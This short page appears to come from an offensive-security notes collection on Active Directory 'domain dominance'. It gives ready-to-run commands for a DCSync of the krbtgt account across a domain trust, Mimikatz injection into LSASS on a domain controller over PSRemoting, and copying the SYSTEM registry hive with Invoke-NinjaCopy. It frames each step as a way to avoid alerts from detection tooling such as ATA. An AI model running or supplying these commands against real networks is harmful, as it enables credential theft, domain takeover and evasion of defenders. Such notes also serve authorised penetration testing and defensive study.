Domain Dominance

DCSync Across Trusts

DCsync from a user machine will for sure cause suspicious and generate an alert, but you can actually perform DCSync across trusts as this is normal traffic since DCs replicate stuff all the time.

PS C:\Users\childuser\Desktop> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:domain.com /user:domain\krbtgt"' -ComputerName child-dc

PSRemoting

Mixing PSremoting and other attacks will not be detected by ATA. For example, with WinRM or PSRemoting, we can inject Mimikatz into LSASS on a dC and grab the credentials in memory:

Invoke-Mimikatz -Command '"privilege::debug" "LSADump::LSA /inject"' -Computer dc

Another thing you could to is use NinjaCopy, which uses PSRemoting with raw disk access to make a copy of the live system file:

Invoke-NinjaCopy -Path "c:\Windows\System32\config\SYSTEM" -ComputerName "dc" -LocalDestination "c:\temp\system"

PreviousLateral Movement NextIdentification

Last updated 2 years ago